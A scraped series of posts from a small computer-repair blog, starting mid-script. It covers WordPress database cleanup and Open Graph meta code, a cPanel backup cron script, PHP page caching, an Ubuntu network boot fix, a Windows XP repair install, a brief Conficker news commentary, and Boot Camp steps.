   $password = DB_PASSWORD; //pulls password from wp-config
   $server = DB_HOST; //pulls host address from wp-config
   $dB = DB_NAME; //pulls database id from wp-config
   $connect = mysql_connect($server, $username, $password);
   if (!$connect){ //outputs error info should connection fail
   	 die('Could not connect: ' . mysql_error());
   }
   else{
   	mysql_select_db($dB, $connect);
   }
   
   //DONE CONNECTING
   
   //Step 1. Empty trash WARNING YOU WILL NOT BE ABLE TO RESTORE ANY ITEMS IN THE TRASH AFTER THIS IS RUN
   $emptyTrash = "DELETE FROM wp_posts WHERE post_status = 'trash'";
   $emptyTrash = mysql_query($emptyTrash);
   
   //Step 2. Recount Posts in Each Category
   $getTaxID = "SELECT * FROM wp_term_taxonomy";
   $getTaxID = mysql_query($getTaxID);
   if(!$getTaxID){
   	print 'Error: '.mysql_error();
   }
   while($row = mysql_fetch_array($getTaxID, MYSQL_ASSOC)){
   	$taxID = $row["term_id"];
   	$countTaxPost = "SELECT * FROM wp_term_relationships WHERE term_taxonomy_id = '$taxID'";
   	$countTaxPost = mysql_query($countTaxPost);
   	$count = 0;
   	while($rowCount = mysql_fetch_array($countTaxPost, MYSQL_ASSOC)){
   		$count++;
   	}
   	$getName = "SELECT * FROM wp_terms WHERE term_id = '$taxID'";
   	$getName = mysql_query($getName);
   	if(!$getName){
   		print 'Error: '.mysql_error();
   	}
   	$termName;
   	while($taxName = mysql_fetch_array($getName, MYSQL_ASSOC)){
   		$termName = $taxName["name"];
   	}
   
   	$updateCount = "UPDATE wp_term_taxonomy SET count = '$count' WHERE term_id = '$taxID'";
   	$updateCount = mysql_query($updateCount);
   	if(!$updateCount){
   		print "Error: ".mysql_error();
   	}
   }
   ?>
   

So for a while I was using the BackupWordpress plugin which would create a backup of my wordpress installation, complete with the databases. This worked for a while, but my work sometimes strays outside of wordpress and with so many instances of the same plugin running on the server, resources quickly became depleted and it was making for a bad user experience. So I do some research and I find that cPanel has a full backup option that is complete with my entire ‘home’ directory, MySQL databases, email settings, domains, etc. Great! Only downside, there’s no option to schedule it, which means I have to remember to log into cPanel every day and run a backup if I want to have a decent backup archive.

Since that goes against the programmer in me I turned to google and have assembled a PHP script that automates the backup process (providing the option to store the backups in your home folder or on a remote FTP server) AND keeps your home folder clean by giving you the option to automatically delete backups that have reached a certain age.

You’ll need to know a few things before you can use this script but I’m sure you’ll have no problem getting the info:

1. Your cPanel URL (i.e. http://www.example.com/cpanel)
2. The username and password to log in to the platform
3. The skin your cPanel installation is usable (you can find this by logging in and looking for the theme row in the left sidebar)
4. The FTP credentials IF you are going to use the remote FTP option

Here’s the code:

<?php

/*This script by Total Computers USA is designed to be used as a cron job. On execution it will remove all backup files of a specified name from the server that are older than the specified age. It will then create a new backup.*/

// ********* THE FOLLOWING ITEMS NEED TO BE CONFIGURED *********

// Info required for cPanel access
$cpuser = ""; // Username used to login to cPanel
$cppass = ""; // Password used to login to CPanel
$domain = ""; // Domain name where CPanel is run
$skin = "x3"; // Set to cPanel skin you use (script won't work if it doesn't match). You can locate the theme name by logging into your cPanel and looking for the "theme" row in the left sidebar

// You only need to fill out this section if you intend to create your backup on a remote server via cPanel's FTP option
$ftpuser = ""; // Username for FTP account
$ftppass = ""; // Password for FTP account
$ftphost = ""; // Full hostname or IP address for FTP host
$ftpmode = ""; // FTP mode ("ftp" for active, "passiveftp" for passive)

// Notification information
$notifyemail = ""; // Email address to send results

// Secure or non-secure mode
$secure = 1; // Set to 1 for SSL (requires SSL support), otherwise will use standard HTTP when connecting to the cPanel server

// Set to 1 to have web page result appear in your cron log
$debug = 1;

//How old to you want backup files to get

$maxAge = ''; //in days (e.g. 5) Enter 0 to never delete the backups.

//Where do you want the backup to go?

$backupLocation = ''; //enter homedirectory or ftp

//File basename to search for
$fileBasename = ''; //in cPanel environments this typically starts with backup. Enter Full Path here (e.g. /home/username/backup-*.tar.gz)
$fileBase = ''; //enter just the beginning of the file name here where the name is constant (e.g. backup-)

// *********** NO CONFIGURATION ITEMS BELOW THIS LINE *********

//For space's sake, check SERVER for files older than maxAge and delete them.
$files = glob($fileBasename); //locates expired files on server and deletes them
if(count($files) > 0 && $maxAge != '0')
{
    foreach($files as $file)
    {
        $age = strtotime(now) - filectime($file);
		if(($maxAge * 86400) <= $age){
			unlink($file);
			print 'Deleted '.$file.'<br />';
		}
	}
}

if ($secure) {
   $url = "ssl://".$domain;
   $port = 2083;
} else {
   $url = $domain;
   $port = 2082;
}

$socket = fsockopen($url,$port);
if (!$socket) { echo "Failed to open socket connection... Bailing out!\n"; exit; }

// Encode authentication string
$authstr = $cpuser.":".$cppass;
$pass = base64_encode($authstr);

switch($backupLocation){
	case 'homedirectory':
	$params = "dest=homedir&email=$notifyemail&submit=Generate Backup";
	break;

	case 'ftp':
	$params = "dest=$ftpmode&email=$notifyemail&server=$ftphost&user=$ftpuser&pass=$ftppass&submit=Generate Backup";
	break;
}

// Make POST to cPanel
fputs($socket,"POST /frontend/".$skin."/backup/dofullbackup.html?".$params." HTTP/1.0\r\n");
fputs($socket,"Host: $domain\r\n");
fputs($socket,"Authorization: Basic $pass\r\n");
fputs($socket,"Connection: Close\r\n");
fputs($socket,"\r\n");

// Grab response even if we don't do anything with it.
while (!feof($socket)) {
  $response = fgets($socket,4096);
  if ($debug) echo $response;
}

fclose($socket);

?>

Now all you need to do is save the PHP file, upload it to your server, and schedule a cron job.
You’re done!

Well, earlier this week I upgraded to 11.10 and, as with most upgrades, got into a little bit of trouble.

At first glance everything was fine. I had to reconfigure my FTP settings and deactivate the firewall (I have an NAT and the server isn’t storing anything sensitive and is for local access only, so instead of dealing with the headache of port opening, I just turn the thing off). But this morning I noticed that I had some updates that needed a reboot to complete. Stupidly, I rebooted the machine. As it was coming back up it gave me a new message about trying to obtain network settings. When it couldn’t (although I found out it did) it skipped to “Waiting 60 more seconds for network configuration” or something like that.

*Yawns*

Finally it jumps to “Booting system without full network configuration” even though my router shows my mac address and clearly assigned it an IP. Then it hangs there. Two minutes later I figured it was a bad boot and tried it again. No avail.

I started reading tutorials plagued with complaints but that had no real solutions. Some people complained the fixes listed worked only for a single boot. On the next reboot the problem recurred.

A couple of theories were the network manager was to blame, or that it had something to do with lightdm, one of Ubuntu’s xdisplay managers. I decided to try a combination of all of the advice to deal with the issue since following individual forums wasn’t working. This process requires the removal of network manager, while you should not lose network connectivity, it is possible. Go to http://packages.ubuntu.com/oneiric/i386/network-manager/download and from one of the mirrors download the network manager deb file. Save it on a removal drive that you will have handy during the process just in case.

Here’s the cocktail I used to fix my machine. All commands will appear like this. Be sure to press enter after each command for you noobies.

1. Boot it up and wait for it to hang on “Booting system without full network configuration.”
2. When it gets there press Ctrl+Alt+F1. You should get the shell prompt. See… the computer is loading, its just the GUI that can’t start because of a hangup somewhere.
3. Log in.
4. Switch to the root user by punching in ‘sudo -i‘ (no quotes). Enter your root password when prompted. For the noobies, the bash shell is a lot like telnet in that it won’t show you punching your password in. The cursor will just sit idle, but have no fear, it’s catching what your typing. Press enter after you’ve entered the password.
5. Now you have the command prompt as root@<computername>.  Remove the lightdm display manager.
1. Type apt-get purge lightdm.
6. Remove the network manager and all of its settings.
1. Type apt-get purge network-manager.
7. Remove the gnome display manager.
1. Type apt-get purge gdm
8. Now we need to move some stuff around. /var/run has some stuff in it that is adding to the disruption so, we move it and re-link folders in the system so that we can boot correctly. Enter the following commands, pressing ‘enter’ after each one.
1. mv /var/run/* /run
2. rmdir /var/run
3. ln -s /run /var/run
4. ln -s /run/lock /var/lock
9. Now let’s put everything back together. First we reinstall network manager.
1. apt-get install network-manager
1. If you are having a problem with this first type dhclient eth0. Eth0 is the default name of a ubuntu wired connection. If you have changed it, please enter the name you used instead. This will get you a new IP address. Once the process completes try 9A again.
2. If dhclient eth0 doesn’t fix it use the following steps to reinstall network-manager.
1. Plug in your removable device. Wait 30 seconds
2. Type ls -l /media into the prompt
3. A list should appear with the name of your device on it.
4. Type cd /media/<THE NAME OF YOUR DEVICE EXACTLY AS IT APPEARS>. If there’s a space in your device’s name put /media/<THE NAME OF YOUR DEVICE EXACTLY AS IT APPEARS> in double quotes (e.g. cd “/media/<THE NAME OF YOUR DEVICE EXACTLY AS IT APPEARS>”).
5. Once your directory has changed, type ls -l again to get a list of all of the files on your device. I do this so I can see exactly how the file is named.
6. Type dpkg -i <package name exactly as it appears on the list>.
7. Network manager will reinstall. When it’s complete type service network-manager start
8. Retry step 9A.
10. Then we reload the gnome display manager
1. apt-get install gdm
11. Finally we reconfigure the display manager to ensure everything has been updated to move away from lightdm
1. dpkg-reconfigure gdm
12. Reboot
1. reboot

Voila! That should do it!

Enter the world of caching.

Caching basically saves all of the results of your dynamic functions in a static version of the page so that in times of high traffic everything you need is right on your server as static text.

The code:

  if(!function_exists('getCache')){
	function getCache($hours){
	##Finds if cache file exists and loads it on true

	$cachefile = 'cache/'.basename($_SERVER['PHP_SELF']); //filename from URL
	if ($_SERVER['QUERY_STRING']!='') { //accounts for ?
	  $cachefile .= '_'.base64_encode($_SERVER['QUERY_STRING']);
	}

	$cachetime = $hours * 60 * 60; // converts hours to seconds

	// Serve from the cache if it is younger than $cachetime
	if (file_exists($cachefile) && (time() - $cachetime < filemtime($cachefile))) {
	  include($cachefile);
	  echo "<!-- Cached ".date('jS F Y H:i', filemtime($cachefile))." -->";
	  exit;
	}

	//Delete from the cache if exists but is older than the cache time
	else if (file_exists($cachefile) && (time() - $cachetime >= filemtime($cachefile))){
		unlink($cachefile);
	}

	ob_start(); // start the output buffer
	}
  }
  if(!function_exists('buildCache')){
	function buildCache(){
	$cachefile = 'cache/'.basename($_SERVER['PHP_SELF']); //filename from URL
	if ($_SERVER['QUERY_STRING']!='') { //accounts for ?
	  $cachefile .= '_'.base64_encode($_SERVER['QUERY_STRING']);
	}

	$fp = fopen($cachefile, 'w+'); // open the cache file for writing
	fwrite($fp, ob_get_contents()); // save the contents of output buffer to the file
	fclose($fp); // close the file
	ob_end_flush(); // Send the output to the browser
  	}
  }
?>

I manage and build my cache files with two basic functions. The first is getCache().

Simply copy and paste the above function at the top of your page (before anything else) or put it in an include library that you attach to your PHP script. Then call the function at the very top of your script.

<?php getCache('2'); ?>

The ’2′ is the number of hours I want to let my cache live for. We do this so that you always have recent data. In this case, the function will look for a cache file, if one exists it will look to see how old it is. If it is older than two hours it will delete the file and allow the dynamic parts of your script to execute, downloading fresh data for a new cache file.

At the very bottom of your script is where you place the function that builds the cache file. buildCache().

<?php buildCache(); ?>

buildCache() looks at everything that happened before after all of the dynamic processes have run. It stores the resulting page as a static HTML file so the next time it loads no calls outside of the server are made, causing a dramatic decrease in load time.

That’s it!

Everything below is accomplished with the use of <meta> tags which belong toward the top of the <head> tag. In a typical WordPress theme these are found in the header.php file.

It’s really easy to get the title of the page to display correctly so let’s get that out of the way. Defining that is achieved below.

<meta property="og:title" content="TITLE GOES HERE" />

In a WordPress environment this is constantly changing and we want to style it so it looks good. The code below checks to see if the link is for the site’s homepage. If it is, it just displays the site’s name. Otherwise it displays the name of the page or post — on Facebook the site’s URL appears below it anyway so there’s no need to clutter up the meta tag.

<meta property="og:title" content="<?php if (!is_front_page()){ wp_title(''); } else{ bloginfo('name'); } ?>" />

Then there’s the little bit of text that helps explain what’s on the page. You don’t want to make your visitors type that out themselves when they share it right? And you want it to say what you it to say. You can control what pops up there by using

<meta property="description" content="DESCRIPTION GOES HERE" ?>

In WordPress you can populate the description with the first words of a post/page/category, or its excerpt. How I do it below pulls a categories description when appropriate, checks for an excerpt for a page/post and if one doesn’t exist uses the first 300 characters from the post (HTML gets stripped) — otherwise it pulls the description for the site in general. This works with WP E-Commerce since the latest versions create products and categories via custom post types.

<meta name="description" content="<?php

//Description for category archive pages
if (is_category())
{
	$description = strip_tags(category_description($category));
	if (strlen($description) > 300){
		print substr($description, 0, 297).'...';
	}
	else{
		print $description;
	}
}

//Description for single posts and pages
else if (is_single() || is_page())
while (have_posts()) : the_post();
{
	$description = strip_tags(get_the_excerpt('')); 

	if (strlen($description) > 300){
		print substr($description, 0, 297).'...';
	}
	else{
		print $description;
	}
}
endwhile;

//Everything else

else if(is_front_page() || is_home()){
		;
}

else
{
	bloginfo('description');
}

?>" />

Pictures are key. When you copy and paste a link into Google Plus, Facebook or any other social network you’re going to want a thumbnail to pop up. If it’s a blog post or an item you are selling, you’re going to want that thumbnail to be relevant. You can define the thumbnail in the <head> tag with one simple line of code.

<meta property="og:image" content="IMAGE URL GOES HERE" />

FYI, each social network is different and will determine a different thumbnail size, but I try to keep the image at 150px X 150px.

I know what you’re thinking, sure, that’s helpful if I code each page by hand, but what about in a dynamic environment like WordPress? Well, I’ve got you covered there too. If you use the code below several things will happen. First, it will check to see the like is your site’s front page, or if there is no product/featured image defined. If either one of those conditions are true it will display a generic image. Then it will look to see if it’s a product page by WP E-Commerce — if it is, it will show the product’s thumbnail. Finally if it’s not the front page and it’s not a product then it will show the featured image from the post or page you’re linking to. Be sure to fill in a URL for your generic image between the quotes after $genericImage.

<?php
require('wp-admin/includes/plugin.php');
//OG:IMAGE
$genericImage = ''; //Enter the URL of the image to use in metadata if a thumbnail is NOT available
if(!is_front_page()){
	while (have_posts()) : the_post();
	{
		if(is_plugin_active('wp-e-commerce/wp-shopping-cart.php') && wpsc_the_product_thumbnail()){ //OG:IMAGE FOR PRODUCTS
			print '<meta property="og:image" content="'.wpsc_the_product_thumbnail().'" />';
		}
		else if(has_post_thumbnail()){ //OG:IMAGE FOR POSTS/PAGES
			print '<meta property="og:image" content="';
			$image_id = get_post_thumbnail_id();
 			$image_url = wp_get_attachment_image_src($image_id,'large');
   			$image_url = $image_url[0];
			print $image_url.'" />';
		} 

		//USES A STATIC IMAGE IF POST DOESN'T HAVE A THUMBNAIL
		else
		{
			print '<meta property="og:image" content="'.$genericImage.'" />';
		}
	}
	endwhile;
}
//USES A STATIC IMAGE ON THE FRONT PAGE
else{
	print '<meta property="og:image" content="'.$genericImage.'" />';
}

?>"

For the more savvy PHP programmers out there, you may have noticed I included

require('wp-admin/includes/plugin.php'); 

at the top of the OG:IMAGE code. This is necessary to determine if WP e-Commerce is in use. If it’s not, the check for a product thumbnail will error out, so be sure to include this!

Now, obviously I don’t take the time to write this stuff out piecemeal every time I build a site. I have it all together in a file I have named fbmeta.php.

<?php require('wp-admin/includes/plugin.php');
$genericImage = ''; //Enter the URL of the image to use in metadata if a thumbnail is NOT available
?>

<meta property="og:title" content="<?php if (!is_front_page()){ wp_title(''); } else{ bloginfo('name'); } ?>" />
<meta name="description" content="<?php

//Description for category archive pages
if (is_category())
{
	$description = strip_tags(category_description($category));
	if (strlen($description) > 300){
		print substr($description, 0, 297).'...';
	}
	else{
		print $description;
	}
}

//Description for single posts and pages
else if (is_single() || is_page())
while (have_posts()) : the_post();
{
	$description = strip_tags(get_the_excerpt('')); 

	if (strlen($description) > 300){
		print substr($description, 0, 297).'...';
	}
	else{
		print $description;
	}
}
endwhile;

//Everything else

else if(is_front_page() || is_home()){
		;
}

else
{
	bloginfo('description');
}

?>" />

<?php 

//OG:IMAGE
if(!is_front_page()){
	while (have_posts()) : the_post();
	{
		if(is_plugin_active('wp-e-commerce/wp-shopping-cart.php') && wpsc_the_product_thumbnail()){ //OG:IMAGE FOR PRODUCTS
			print '<meta property="og:image" content="'.wpsc_the_product_thumbnail().'" />';
		}
		else if(has_post_thumbnail()){ //OG:IMAGE FOR POSTS/PAGES
			print '<meta property="og:image" content="';
			$image_id = get_post_thumbnail_id();
 			$image_url = wp_get_attachment_image_src($image_id,'large');
   			$image_url = $image_url[0];
			print $image_url.'" />';
		} 

		//USES A STATIC IMAGE IF POST DOESN'T HAVE A THUMBNAIL
		else
		{
			print '<meta property="og:image" content="'.$genericImage.'" />';
		}
	}
	endwhile;
}
//USES A STATIC IMAGE ON THE FRONT PAGE
else{
	print '<meta property="og:image" content="'.$genericImage.'" />';
}

?>

Finally, 75+ lines of code is A LOT to put in a header file — it can be very confusing if you come back in 6 months to change something. So what I do is put the above code in a separate file, called fbmeta.php (you, of course, can name it whatever you want, just be sure to make the change in the code below) and I save the file in the active WordPress theme’s folder. Then I go into the theme’s header.php file and look for where it has meta tags. I check to make sure og:image, description and og:title aren’t in use (if they are I delete them) and I simply add

<?php include('fbmeta.php'); ?>

beneath the last meta tag.

Done! Enjoy.

Repair installs can often fixed corrupt driver issues that cause the legendary Blue Screen of Death

Windows XP is currently the most stable operating system (OS) created by Microsoft (Vista? Let’s not joke.) And while many aficionados do anxiously await the October 2009 release of Windows 7, it’s not here yet.

Being the most stable, however, does not make it infallable… after all it does run on a computer. So what does one do when this OS renowned for it’s stability becomes unstable? You repair it.

A repair install of an operating system can fix a corrupt registry, repair a boot record, or even establish the geography of a new drive that you just migrated your data to.

Does your computer continuously reboot itself on startup? Repair install. Is it acting weird after it lost power half way through an update? Repair install. Does it not turn on after being thrown down a flight of stairs? Well… I won’t lie… a repair install isn’t that effective.

It’s also smart to run a repair install after running a super-powered malware cleaner (like Combofix) to restore those very important DLLs that combofix no-doubtedly wiped out along with your virus. I know what your thinking “Enough already, get to the friggin tutorial… my computer isn’t working!”

Before we begin, let me say that the following tutorial assumes that the damaged (or otherwise in need of repair) Windows installation is located at C:\Windows. If you are not an advanced user, don’t worry… chances are this is where it is. If you are an advanced user, or if you know this isn’t where it is, just be sure to pay attention.

So… here it is:

1. You will need a Windows XP Setup disc. Find yours and be sure to have your 25 character CD Key handy (you may or
   

   The above condition is virtually irreparable without a repair install. Either an important system file is missing, or the computers registry (it's index of EVERYTHING) is pointing the wrong spot. Either way, a repair install is probably the least complicated route of repair.

   may not need it.) Boot your computer with the install CD in the drive. Be sure to tell your BIOS to boot off of the CD. If you are unsure how to do this look at the first screen you see… usually it bears the logo of your computer’s manufacturer. Somewhere on that screen it should say something like “F12 to enter boot menu.” If you don’t see it, try F12 or F10… or Google it.

2. Once you have completed step one a message should appear that says “Press any key to boot from CD or DVD…” Press enter. (If you don’t see this you may a quick screen that says “Setup is inspecting your computers configuration”… keep going if you see this).
3. Set up will start loading up the necessary drivers (i.e.”Press F6 for automated setup… yada yada yada”). Once the CD loads up it will display a “Welcome to Windows XP Setup” screen. Press ‘R’.
4. Wait approximately 15 seconds and then enter the number that corresponds with the line “C:\Windows” (Typically 1.). Press enter.
5. Once you get into the command prompt type “bootcfg /rebuild” (no quotes). Press Enter.
6. Wait a couple of minutes and then it will ask you if you want to add “X” installation to the boot list. If the installation displayed is not C:\Windows type ‘N’. Press Enter. If it is “C:\windows” press ‘Y’ and hit enter.
7. After you have hit Y it will ask you for a “Load Identifier”. Type “Microsoft Windows XP Professional” (no quotes).
8. Then it will ask you to enter Load option. type “/fastdetect” (no quotes).
9. Type exit. The computer will restart.
10. Repeat steps 1 and 2 (for step 1 you should already have the disc, so don’t worry about getting up to look for it).
11. Once the same “Welcome to Windows XP Setup” screen loads up press enter.
12. Press F8 to accept the license agreement.
13. C:\windows should now appear on a list of “Previously installed versions of Windows”. Select the one you want to repair and press ‘R’.
14. The repair should begin. This will delete your system shell (just the core stuff, your programs and files will remain in tact). Once this is done it will begin copying files. These are fresh copies of all the files you need to run windows. Once the copying has completed the computer will count down from 15 and reboot. From there a prettier setup screen should load. Be sure to have your license key handy, as you may need it.
15. Just follow the on screen prompts and once the install is complete you should be done! XP Repaired. Enjoy.

Just to note if the above does not fix whatever problem you are experiencing, you can always use the same CD to reformat your hard drive and start from scratch. Whatever the problem is… if it is software based a reformat will fix it.

WARNING: A reformat of your hard drive will ERASE ALL of your DATA, so if your files are important to you I suggest navigating to the ‘contact‘ page and contacting us.

Just a note for those of you who complete a repair install, you will need to run windows update again. All of the files that you patched and updated have been replaced by their originals off of your install CD, so for the sake of security go to http://update.microsoft.com and do a Windows Update.

An Illustration on how Conficker spreads

So I spent much of last night researching this Conficker virus. I wanted to try and figure out how to prevent it and how to kill it. I figured there was so much hype about the fourth version of this nuisance it was worth looking in to.

Snorefest.

It was very dramatic coverage on the part of CBS that got my attention, but as it would turn out any Windows  based computer that has performed a critical update since October 2008 would have been safe from this worm.

Essentially the bug exploited a flaw in the Windows framework that would give its creators use of a remote computer. It is then assumed that computer would be made into a drone that would forward spam, the worm or be an accessory to identity theft. According to an article by the Associated Press

The worm can take control of unsuspecting PCs running Microsoft’s Windows operating system. Tied together into a “botnet,” these PCs can be directed to send spam, carry out identity-theft scams and bring down Web sites by flooding them with traffic.

A botnet is simply a network of computers, located in different places around the world, that are brought together by a bug such as Conficker. Apparently, techs from various security companies dissected the code to find that the bug was going to “phone home” on April 1st. Essentially the worm is really only able to infect any computers that haven’t performed an update since October. . . namely pirated versions of Windows that get denied access to the Microsoft Update site.

The current symptoms of the bug here in the U.S. are currently a simple blockage of access to various security sites (Microsoft, Trend Micro, Symantec etc.) If you are experiencing these symptoms I recommend you try to clean it out yourself or call a qualified Windows professional (I recommend www.totalcomputersusa.com).

So in the end, if you are running an up to date virus scanner and have automatic updates enabled on your computer you are safe from this bug. What is scary is that such a simple measure apparently was not taken by CBS Networks. . . I wonder if they have any new job openings. . .  perhaps in the IT department?

The idea of assembling a computer is often overcomplicated to the inexperienced. The video above is the least time consuming, and least frustrating way in which Total Computers U.S.A. assembles the computers purchased by its customers.

]]> http://www.totalcomputersusa.com/2009/03/video-building-a-computer/feed/ 0 http://www.totalcomputersusa.com/2009/03/boot-camp-a-how-to/ http://www.totalcomputersusa.com/2009/03/boot-camp-a-how-to/#comments Thu, 12 Mar 2009 16:28:47 +0000 TC McCarthy http://totalcomputersusa.wordpress.com/?p=17 Continue reading →]]>

2. You can try to find the beta download of Boot Camp for OSX Tiger. If you have Leopard it will be built in.

3. Run Boot Camp from Applications -> Utilities

4. Set your partition size and pop in your version of Windows XP (Must be SP2 SP1 and SP3 are currently incompatible)

5. Let windows install.

6. Pop in your OSX Leopard Disc 1 once Windows comes up. This will auto-install all of the necessary drivers for you. (Sound, video, wifi, network, camera, keyboard etc.)

7. Use your Computer.

[youtube=http://www.youtube.com/watch?v=ClhRk0dTIwg]